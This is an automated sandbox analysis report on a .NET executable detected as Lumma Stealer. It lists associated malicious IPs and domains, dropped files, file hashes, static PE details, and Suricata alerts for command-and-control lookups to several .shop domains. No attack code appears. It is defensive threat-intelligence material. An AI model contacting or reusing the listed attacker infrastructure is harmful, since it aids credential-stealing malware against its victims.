Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	5_6253708004881862888.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/6@12/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 36 Number of non-executed functions: 75
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.63, 172.202.163.200, 40.126.53.10
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:40:13	API Interceptor	15x Sleep call for process: RegAsm.exe modified
07:22:36	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.66.86	MV ROCKET_PDA.exe	Get hash	malicious	FormBook	Browse	www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
23.55.153.106	noll.exe	Get hash	malicious	Stealc, Vidar	Browse
	1fxm3u0d.exe	Get hash	malicious	LummaC	Browse
	2kudv4ea.exe	Get hash	malicious	LummaC	Browse
	ardware-v1.exe	Get hash	malicious	LummaC	Browse
	ardware-v1.exe	Get hash	malicious	LummaC	Browse
	sNWQ2gC6if.exe	Get hash	malicious	LummaC	Browse
	66DJ2wErLz.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
104.131.68.180	java.exe	Get hash	malicious	Tinba	Browse	uyhgqunqkxnx.pw/EiDQjNbWEQ/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lev-tolstoi.com	1fxm3u0d.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	2kudv4ea.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
steamcommunity.com	noll.exe	Get hash	malicious	Stealc, Vidar	Browse	23.55.153.106
	1fxm3u0d.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	2kudv4ea.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	sNWQ2gC6if.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	66DJ2wErLz.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Xmrig	Browse	104.102.49.254
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	104.121.10.34
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	104.121.10.34

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	noll.exe	Get hash	malicious	Stealc, Vidar	Browse	23.55.153.106
	1fxm3u0d.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	2kudv4ea.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	EXTERNALRe.msg	Get hash	malicious	Unknown	Browse	23.44.201.32
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	23.218.93.195
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	23.43.121.120
	https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D	Get hash	malicious	Unknown	Browse	104.116.245.16
	https://walli.shanga.co/image/view/?id=1375	Get hash	malicious	Unknown	Browse	172.232.25.148
DIGITALOCEAN-ASNUS	ardware-v1.exe	Get hash	malicious	LummaC	Browse	178.62.201.34
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	104.131.68.180
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	128.199.101.123
	https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0Z	Get hash	malicious	HTMLPhisher	Browse	142.93.3.60
	jew.arm.elf	Get hash	malicious	Unknown	Browse	159.89.214.114
	jew.mips.elf	Get hash	malicious	Unknown	Browse	167.71.219.172
	jew.m68k.elf	Get hash	malicious	Unknown	Browse	46.101.242.244
	https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VUN0JRQTRLU1hTVDBDM1RLNFpLVU9CTVlJSC4u&sharetoken=nQqCF0yk9yLYcWPsu8Rb	Get hash	malicious	Unknown	Browse	167.99.117.99
	https://garfieldthecat.tech/Receipt.html	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
	https://docs.google.com/presentation/d/e/2PACX-1vS4E-28RyhuHX8_MZcsg7wizgGkSwW0LDVl5HNjN-NsvlVsETQwbyEWxbBU714X4OECIwqCDQyWoANZ/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	159.65.213.219
CLOUDFLARENETUS	1fxm3u0d.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	2kudv4ea.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32	Get hash	malicious	Unknown	Browse	104.21.52.161
	Memo - Impairment Test 2023 MEX010B (5).js	Get hash	malicious	Unknown	Browse	104.21.10.224
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.21.23.76
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	172.67.191.110
	NativeApp_G5L1NHZZ.exe	Get hash	malicious	LummaC Stealer	Browse	172.64.41.3
	hzD92yQcTT.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	Awb 4586109146.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	PO 0309494059506060609696007.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	1fxm3u0d.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106 104.131.68.180
	2kudv4ea.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106 104.131.68.180
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.21.66.86 23.55.153.106 104.131.68.180
	NativeApp_G5L1NHZZ.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.66.86 23.55.153.106 104.131.68.180
	hzD92yQcTT.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106 104.131.68.180
	JnEZtj3vtN.exe	Get hash	malicious	PureCrypter	Browse	104.21.66.86 23.55.153.106 104.131.68.180
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106 104.131.68.180
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	104.21.66.86 23.55.153.106 104.131.68.180
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106 104.131.68.180
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.21.66.86 23.55.153.106 104.131.68.180

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_31b44a5562c15e927d8eb7658df48455463358c_ee039a57_67d72958-09c2-47ba-897e-02d8f04fc406\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0810477807696426
Encrypted:	false
SSDEEP:	192:b7wmeFy/d+0o0BU/AjezEK2zszuiFR+Z24IO8Zk:fwAd+0DBU/AjeogzuiFR+Y4IO8Z
MD5:	4568664AD8D8EEF08ED2A208886983F9
SHA1:	FD084FC8DB6B8EC79521B18F3EAE1846B85DDE62
SHA-256:	F0CDB986F2B4F67C18FC33750EA1C6FF8AF6E4BD43C671862F21AFE5E6BF0378
SHA-512:	EDA9D1C61093C705332F820AA08528417FECA6A09240551ACDB44CAF7391190B4ACF64C98F29780431A146B30640EA59AB249B743B99431828D9B030C40D2CD1
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.9.8.1.2.2.0.0.5.2.2.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.9.8.1.2.2.7.2.3.9.4.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.7.d.7.2.9.5.8.-.0.9.c.2.-.4.7.b.a.-.8.9.7.e.-.0.2.d.8.f.0.4.f.c.4.0.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.0.f.3.5.9.2.-.f.6.0.0.-.4.0.9.6.-.b.7.b.6.-.3.d.d.2.1.d.d.2.8.4.6.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.8.4.-.0.0.0.1.-.0.0.1.4.-.3.a.b.4.-.1.e.3.6.3.9.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3346.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Dec 18 12:22:02 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	108266
Entropy (8bit):	2.0472807471582573
Encrypted:	false
SSDEEP:	384:DAXZXOJd895HnnxauERWYV0Vk8ZFxkbyj9pLtDDNpiQhYHIv37cTF6Is6Qcb6yn:cXZ+k95nERvxYFNDLNWl6C
MD5:	E42A7B0824319BCD8DEA90287E237F74
SHA1:	E90F9FDBB4195BFCC5F44578A83476C45604250B
SHA-256:	27CA7ADBC36DCA4B36231A6B26462006EBB92652381334DFC60199E361CA5A9B
SHA-512:	CE2C534AB4A40C59ACFFC35B23DF83795C392ECF74B8CF3BEF2396BB4BA27EA6C2EE0FA95C63221ED0D44641996699FDC204C5265D2894468FF307BF3CA28E22
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......j.bg....................................t...\|%..........~P..........`.......8...........T...........`F...`...........&...........(..............................................................................eJ......t)......GenuineIntel............T.............bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3441.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6308
Entropy (8bit):	3.722263922233064
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbwX6IOYYtEBhQE/YQz5aM4U489bP9esfyA9lm:R6l7wVeJwX6IOYYq5pr489b1esfyAHm
MD5:	AE711916F74442CC123DB4D40B3461E8
SHA1:	DC4FE7E99DB8087AFF98F4A006E11710F11B7269
SHA-256:	6BF76F92DDA872F6EC2279C790887AA29F4EEB7212163CECD6AA89937C57ECE9
SHA-512:	95F5842E2E023C2395445461AD05BF2A795896D0BF7F4DD0C5A57CB518278BE8473DE3B3EBCB059EEDC5584F086C1975FF79A9F08DCEB12AE6A741C75C153EBA
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER354C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4628
Entropy (8bit):	4.453609227217728
Encrypted:	false
SSDEEP:	48:cvIwWl8zsNJg77aI9C1WpW8VYIYm8M4Jfu9s9FGXR+q8oSIlQgLuOLuArd:uIjfnI74E7VsJfuqOBvSMBukuArd
MD5:	B37AEF2C6D28D86376D208C5D898173E
SHA1:	2F20A3E1685864450B0BDCFDDFCA60A93DD57D83
SHA-256:	48CEE72FE115E2E842DCE052FC52B71AB5A59BB60DC75144C9C6095FA0BF92E8
SHA-512:	7FAA64EEA3227583907E6011FD6CC26EEB46F916035FD9969CE6E3BF2DD3B8FA04B42D026D8DB0D2D72A880D47B545D837B0F82BE3CB2068413BBAA0CF0B7027
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636684" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5_6253708004881862888.exe.log

Download File

Process:	C:\Users\user\Desktop\5_6253708004881862888.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.417552483791737
Encrypted:	false
SSDEEP:	6144:Ecifpi6ceLPL9skLmb0mdSWSPtaJG8nAgex285i2MMhA20X4WABlGuNL5+:pi58dSWIZBk2MM6AFBlo
MD5:	1BDFEC401D3ADAC659D252E496E746AE
SHA1:	97D288247D1E931F9F8AC219B4A9FCAF57CDE7B5
SHA-256:	48C5B3BC0963FAF54979BBD94BA9F678EA70171628CDE354DE55B88E68AECF66
SHA-512:	1F2E56F9572898270002FE15AD9C37286DEAB40F6FF8FA2B243957E354142D668D364085F047F1D13FC1A748FFD2227A4D8D2195BD4FDF3414512559918014E6
Malicious:	false
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...qGQ..............................................................................................................................................................................................................................................................................................................................................?M.E........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.985969010824924
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	5_6253708004881862888.exe
File size:	319'488 bytes
MD5:	62dad59c8a4bf1e860671c00d12d6bae
SHA1:	80e845f3b3a3e94c9211ff88b02f21a70876544c
SHA256:	7722b15ba8511393f25c183b793ceb9c9b14d5a211e1161b40fde26d8be9bcba
SHA512:	4658bf2f25792771292c6d2f1a7cc771dd2665f20a6580ceb375acd5f1170635eb6436f201cce96e14cd0b5ca7df92cfb2916d878d746a9cd2fd6117ef5bef08
SSDEEP:	6144:k3MnOZq70Pw/yC/L/L6DFWzcRpCCgC+H5x1f7XLDNCk56dxhr3lSmXKor:k8X70Pw/y48FscRgC+HV7b5363hr3ImL
TLSH:	3D642390B7F57126EECF0576B30F4624EA7664701DBD6BD9204CABC69DAA130B214F23
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. .......................@............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x44f2de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66D8E781 [Wed Sep 4 23:04:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4f290	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x50000	0x602	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x52000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x4f158	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x4d2e4	0x4d400	1c26281cdfbacaa23e0f18cbdc6a08a5	False	0.9941753893608414	data	7.995899101105081	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x50000	0x602	0x800	9639fa6120fd371837905935aa41ec17	False	0.34619140625	data	3.469016537160503	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x52000	0xc	0x200	2da99b1c6b7aa0acb3c2f90b041baac5	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x500a0	0x378	data	English	United States	0.4560810810810811
RT_MANIFEST	0x50418	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T11:40:11.288419+0100	2058297	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (muggudrowiwm .shop)	1	192.168.2.7	53162	1.1.1.1	53	UDP
2024-12-18T11:40:12.292864+0100	2058297	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (muggudrowiwm .shop)	1	192.168.2.7	53162	1.1.1.1	53	UDP
2024-12-18T11:40:14.045543+0100	2058298	ET MALWARE Observed Win32/Lumma Stealer Related Domain (muggudrowiwm .shop in TLS SNI)	1	192.168.2.7	49700	104.131.68.180	443	TCP
2024-12-18T11:40:14.045543+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49700	104.131.68.180	443	TCP
2024-12-18T11:40:14.050441+0100	2822521	ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)	1	104.131.68.180	443	192.168.2.7	49700	TCP
2024-12-18T11:40:14.475338+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49700	104.131.68.180	443	TCP
2024-12-18T11:40:14.475338+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49700	104.131.68.180	443	TCP
2024-12-18T11:40:14.482513+0100	2055479	ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)	1	192.168.2.7	49410	1.1.1.1	53	UDP
2024-12-18T11:40:14.629840+0100	2055483	ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)	1	192.168.2.7	53966	1.1.1.1	53	UDP
2024-12-18T11:40:14.773766+0100	2055475	ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop)	1	192.168.2.7	56654	1.1.1.1	53	UDP
2024-12-18T11:40:14.919416+0100	2055477	ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop)	1	192.168.2.7	61846	1.1.1.1	53	UDP
2024-12-18T11:40:15.162418+0100	2055480	ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop)	1	192.168.2.7	58373	1.1.1.1	53	UDP
2024-12-18T11:40:15.302899+0100	2055481	ET MALWARE Lumma Stealer Domain in DNS Lookup (stagedchheiqwo .shop)	1	192.168.2.7	59516	1.1.1.1	53	UDP
2024-12-18T11:40:15.451451+0100	2055482	ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop)	1	192.168.2.7	57263	1.1.1.1	53	UDP
2024-12-18T11:40:15.687016+0100	2055474	ET MALWARE Lumma Stealer Domain in DNS Lookup (caffegclasiqwp .shop)	1	192.168.2.7	59309	1.1.1.1	53	UDP
